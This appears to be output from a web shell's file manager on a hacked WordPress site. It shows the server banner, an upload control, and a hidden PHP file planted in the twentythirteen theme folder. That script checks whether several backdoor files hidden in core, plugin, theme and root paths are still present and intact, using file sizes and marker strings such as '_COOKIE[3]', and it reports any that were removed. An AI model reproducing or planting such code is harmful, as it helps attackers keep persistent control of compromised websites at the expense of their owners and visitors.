HEX
Server: Apache
System: Linux iad1-shared-b8-33 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
User: samfetchero1 (10301780)
PHP: 8.1.31
Disabled: NONE
Upload Files
File: /home/samfetchero1/pacificnorthwestcoastbias.com/wp-content/themes/twentythirteen/.content
<?php   $r = '/home/samfetchero1/pacificnorthwestcoastbias.com'; $x = ["/wp-includes/widgets/class-wp-widget-recent-comments.php"=>"bd@@207561@@Authorization",
"/wp-content/plugins/google-analyticator/google-api-php-client/src/contrib/Google_CoordinateService.php"=>"bd@@385161@@19",
"/wp-content/plugins/jetpack/jetpack_vendor/automattic/jetpack-videopress/build/lib/token-bridge.asset.php"=>"bd@@369402@@73",
"/wp-content/themes/twentythirteen/content-audio.php"=>"bd@@378160@@_COOKIE[3]",
"/a4da43.php"=>"bd@@20412@@105",
"/4863b6.php"=>"bd@@23525@@105"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');